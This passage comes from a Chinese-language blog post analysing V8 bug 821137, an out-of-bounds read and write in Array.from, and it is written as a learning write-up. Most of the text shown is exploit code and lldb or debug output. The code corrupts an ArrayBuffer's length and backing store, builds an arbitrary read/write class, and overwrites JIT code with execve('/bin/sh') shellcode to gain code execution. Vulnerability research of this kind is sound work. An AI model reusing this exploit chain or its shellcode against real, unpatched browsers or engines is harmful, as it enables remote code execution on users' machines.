Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ =&gt; (
    {
        counter : 0,
        next() {
            let result = this.counter++;
            if (this.counter == maxSize) {
                oobArray.length = 5;
                for (let i = 0; i &lt; 100; i++) {
                    bufs.push(new ArrayBuffer(0x1234));
                    let obj = {'a': 0x4321, 'b': func_to_overwrite};
                    objs.push(obj);
                }
                return {done: true};
            } else {
                return {value: result, done: false};
            }
        }
    }
) });

let jit_func_obj_ptr = 0;
console.log(maxSize);
for (let i = 0; i &lt; maxSize; i++) {
    let val = Int64.fromDouble(oobArray[i]);
    if (val == 0x432100000000) {
        console.log('Found', i);
        jit_func_obj_ptr = Int64.fromDouble(oobArray[i + 1]) - 1;
        console.log('JIT Function Pointer: 0x' + jit_func_obj_ptr.toString(16));
        for (let j = i + 2; j &lt; i + 100; j++) {
            console.log("0x" + Int64.fromDouble(oobArray[j]).toString(16));
        }
        break;
    }
}

for (let i = 0; i &lt; maxSize; i++) {
    let val = Int64.fromDouble(oobArray[i]);
    if (val == 0x123400000000) {
        console.log('Found ArrayBuffer');
        changed_idx = i;
        oobArray[i] = (new Int64(0x121200000000)).asDouble();
        oobArray[i + 3] = (new Int64(0x1212)).asDouble();
        break;
    }
}

console.log("======&gt; objs");
%DebugPrint(objs);

console.log("======&gt; oobArray");
%DebugPrint(oobArray);

console.log("======&gt; bufs");
%DebugPrint(bufs);

while(1);
</code></pre></div></div>

<p>我们找到<code class="language-plaintext highlighter-rouge">bufs</code>里面的第一个元素</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>======&gt; bufs
DebugPrint: 0x25e084d8aa31: [JSArray] in OldSpace
 - map: 0x25e0f0002729 &lt;Map(PACKED_ELEMENTS)&gt; [FastProperties]
 - prototype: 0x25e0bd805539 &lt;JSArray[0]&gt;
 - elements: 0x25e084d94121 &lt;FixedArray[140]&gt; [PACKED_ELEMENTS]
 - length: 100
 - properties: 0x25e0b2b82251 &lt;FixedArray[0]&gt; {
    #length: 0x25e0b2bcff89 &lt;AccessorInfo&gt; (const accessor descriptor)
 }
 - elements: 0x25e084d94121 &lt;FixedArray[140]&gt; {
           0: 0x25e084d94691 &lt;ArrayBuffer map = 0x25e0f0003fe9&gt;
           1: 0x25e084d946e1 &lt;ArrayBuffer map = 0x25e0f0003fe9&gt;
           2: 0x25e084d94731 &lt;ArrayBuffer map = 0x25e0f0003fe9&gt;
           3: 0x25e084d94781 &lt;ArrayBuffer map = 0x25e0f0003fe9&gt;
           4: 0x25e084d947d1 &lt;ArrayBuffer map = 0x25e0f0003fe9&gt;
           5: 0x25e084d94821 &lt;ArrayBuffer map = 0x25e0f0003fe9&gt;
</code></pre></div></div>

<p>打印一下内存数据，可以看到第四个字段就是长度了，这里已经被我们改为<code class="language-plaintext highlighter-rouge">0x1212</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(lldb) x/20xg 0x25e084d94690
0x25e084d94690: 0x000025e0f0003fe9 0x000025e0b2b82251
0x25e084d946a0: 0x000025e0b2b82251 0x0000121200000000
0x25e084d946b0: 0x0000000102020c00 0x0000000102020c00
0x25e084d946c0: 0x0000000000001212 0x0000000000000004
0x25e084d946d0: 0x0000000000000000 0x0000000000000000
0x25e084d946e0: 0x000025e0f0003fe9 0x000025e0b2b82251
0x25e084d946f0: 0x000025e0b2b82251 0x0000123400000000
0x25e084d94700: 0x000000010202f400 0x000000010202f400
0x25e084d94710: 0x0000000000001234 0x0000000000000004
0x25e084d94720: 0x0000000000000000 0x0000000000000000
</code></pre></div></div>

<p>好啦，到这里我们解释下如何利用这个ArrayBuffer进行构造任意读和任意写</p>

<p>这是我们目前构造出的内存对象分部图，左边表示<code class="language-plaintext highlighter-rouge">oobArray</code>，中间是内存地址，与上面打印出来的地址对应，右边是<code class="language-plaintext highlighter-rouge">ArrayBuffer[0]</code>的结构对应，所以我们暴搜找到原始数组长度<code class="language-plaintext highlighter-rouge">0x123400000000</code>，此时记录<code class="language-plaintext highlighter-rouge">i</code>，这样<code class="language-plaintext highlighter-rouge">oobArray[i+1]</code>就是<code class="language-plaintext highlighter-rouge">Backing Store</code>字段，而把长度改为<code class="language-plaintext highlighter-rouge">0x1212</code>是因为我们现在有一百个ArrayBuffer，所以需要定位到我们当前这个ArrayBuffer，那么修改长度之后，再对一百个ArrayBuffer进行遍历长度，就可以找到一个<code class="language-plaintext highlighter-rouge">bufs[j].kByteLengthOffset</code>为<code class="language-plaintext highlighter-rouge">0x0000121200000000</code>，此时记录<code class="language-plaintext highlighter-rouge">j</code></p>

<p><img src="/assets/resources/1458D088F0470125D5E17D32ACE47BF4.jpg" alt="IMAGE" /></p>

<p>构造读写原语的方式就出来了：利用<code class="language-plaintext highlighter-rouge">oobArray[i+1]</code>修改<code class="language-plaintext highlighter-rouge">bufs[j].kBackingStoreOffset</code>，然后用<code class="language-plaintext highlighter-rouge">bufs[j]</code>创建一个TypedArray，通过TypedArray进行读写，这样读写的地址就会变成我们修改的地址，也就构造出了任意读写原语</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>let arw = null;

for (let i = 0; i &lt; bufs.length; i++) {
    if (bufs[i].byteLength == 0x1212) {
        class ArbitraryReadWrite {
            constructor(changed_idx_oob, changed_idx_bufs) {
                this.idx_in_oob_arr = changed_idx_oob;
                this.idx_in_bufs_arr = changed_idx_bufs;
            }

            read(addr) {
                let i = this.idx_in_oob_arr;
                oobArray[i + 1] = addr.asDouble();
                oobArray[i + 2] = addr.asDouble();
                let arr = new Float64Array(bufs[this.idx_in_bufs_arr], 0, 0x10);
                return Int64.fromDouble(arr[0]);
            }

            write(addr, vals) {
                let i = this.idx_in_oob_arr;
                oobArray[i + 1] = (new Int64(addr)).asDouble();
                oobArray[i + 2] = (new Int64(addr)).asDouble();
                let arr = new Uint8Array(bufs[this.idx_in_bufs_arr]);
                arr.set(vals);
            }
        }

        arw = new ArbitraryReadWrite(changed_idx, i);
        break;
    }
}
</code></pre></div></div>

<p>所以可以任意读写之后，我们通过读原语读出<code class="language-plaintext highlighter-rouge">Code + 0x5F</code>的值，这个值就是JIT代码的地址，我们通过写原语将ShellCode写进去，最后进行函数调用即可完成RCE</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>let code_addr = arw.read(Add(jit_func_obj_ptr, 0x30));
let jit_code_addr = Add(code_addr, 0x5F);

shell = [0x48, 0x31, 0xf6, 0x56, 0x48, 0xbf, 0x2f, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x57, 0x48, 0x89, 0xe7, 0x48, 0x31, 0xd2, 0x48, 0x31, 0xc0, 0xb0, 0x02, 0x48, 0xc1, 0xc8, 0x28, 0xb0, 0x3b, 0x0f, 0x05];
arw.write(jit_code_addr, shell);
func_to_overwrite();
</code></pre></div></div>

<p>效果如下</p>

<p><img src="/assets/resources/EA65963349864776D36CDD0F382F1321.jpg" alt="IMAGE" /></p>

<h2 id="references">References</h2>
<p>扔个骰子学v8 - 从Plaid CTF roll a d8开始</p>
<ul>
  <li>https://www.anquanke.com/post/id/147829#h3-4</li>
</ul>

<p>补丁</p>
<ul>
  <li>https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d%5E%21/#F0</li>
</ul>

</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'http://localhost:4000/2019/04/16/BUG-821137-Array.from-OOB.html';
     this.page.identifier = '/2019/04/16/BUG-821137 Array.from OOB';
     this.page.title = 'V8漏洞分析 - BUG-821137 Array.from OOB';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//wnagzihxa1n-github-io.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2021/01/22/%E5%A4%A7%E5%9C%9F%E8%B1%86%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0-2021.01.22.html">
            大土豆安全笔记 2021.01.22 在线求团购*OS Internals III
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2021/01/15/%E5%A4%A7%E5%9C%9F%E8%B1%86%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0-2021.01.15.html">
            大土豆安全笔记 2021.01.15 您已本分
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2021/01/08/%E5%A4%A7%E5%9C%9F%E8%B1%86%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0-2021.01.08.html">
            大土豆安全笔记 2021.01.08 我，零基础，学iOS macOS安全
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/android_application_security/" class="set-1">android_application_security</a> <a href="/tag/android_ctf/" class="set-3">android_ctf</a> <a href="/tag/browser_security/" class="set-4">browser_security</a> <a href="/tag/security_daily/" class="set-5">security_daily</a></div>
  




<script>
  let i = 0;
  const text = '';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
